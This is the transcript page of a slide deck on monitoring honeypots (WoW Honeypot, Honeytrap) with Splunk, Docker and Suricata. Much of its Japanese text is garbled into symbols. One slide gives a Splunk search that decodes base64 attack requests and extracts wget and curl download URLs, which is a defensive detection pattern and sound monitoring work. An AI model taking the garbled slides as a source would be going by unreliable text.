Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Splunkによるハニーポット監視.pdf

sec-chick
September 30, 2018
1.5k

 Splunkによるハニーポット監視.pdf

sec-chick

September 30, 2018
Tweet

Transcript

  1. WHO AM I •  sec-chick@one_sec_chick (('/+#!/) •  )/

    ,-$  PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap)  0".*/1
  2. SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$ ,;*!9,+$()0-"# • IT!905!29-6 7*!3 :

      > http://www.intellilink.co.jp/pd/products/package/security/splunk.html
  3.   8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705' 

    3. Splunk5' )7- 4. 37/  5. 2"570 .(70 82"570HEX$6(709
  4.   1.  Docker 2.    3.

    Splunk  4. Suricata 
  5. /.10,-%DOCKER • /.10,-&$ $!"' * ( #)  + $*

    (Docker+ • $ Docker+→% $
  6. %"-+( • .# Docker  %"-+(  • %"-+(cron$,* Splunk

    WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.#   Docker  
  7. SPLUNK+;N?  • 0 '!0.*Splunk+;N? 1  • @:NB+2EJ9N<IM' DECRYPT

    1 • G4MA,+/ - "$F4LNB1@:NB"$ 'D3NKB("& → Grep '!0 *)0 - C=/87J1D3NKB("& → 0 C='#-! 1  - HK562+>5MLNB1%$URL1D3NKB("& → HK562+>5MLNB1VirusTotal'
  8. WOWHONEYPOT |rex field=_raw "¥"(?<Method_wow>[^¥s]+)¥s(?<wow_path>[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? <base64_wow>.*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’)

    |eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"
  9. SURICATA4  • Grep05%72# 9),#1 #  • ;=:><05"68+* 525

    /#2# →  ./ • Suricata3)#&#6),7 !1$/'-(#??
  10.  "!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi

    # • @soji256 • @morihi_soc # -,1.)+  !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ !   2 http://goo.gl/8bLkZA
  11. /)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$  +

    7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD